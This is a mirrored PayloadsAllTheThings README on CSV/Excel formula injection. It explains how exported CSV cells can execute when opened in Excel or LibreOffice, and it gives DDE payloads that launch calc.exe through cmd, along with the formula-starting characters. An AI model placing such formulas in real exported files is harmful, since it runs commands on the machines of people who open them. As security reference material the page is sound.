Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-14 15:22:51 +00:00
Code Issues Projects Releases Packages Wiki Activity
PayloadsAllTheThings/CSV injection/README.md
swisskyrepo bfd50ae2cb Fix in juggling type + CSV injection
2016-10-20 10:50:12 +07:00

29 lines
No EOL
1.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# CSV Excel formula injection
Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
## Exploit
Basic exploit with Dynamic Data Exchange
```
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
Technical Details of the above payload:
cmd is the name the server can respond to whenever a client is trying to access the server
/C calc is the file name which in our case is the calc(i.e the calc.exe)
!A0 is the item name that specifies unit of data that a server can respond when the client is requesting the data
```
Any formula can be started with
```
=
+
@
```
## Thanks to
* https://owasp.org/index.php/CSV_Excel_Macro_Injection
* https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection
*https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
Reference in a new issue View git blame Copy permalink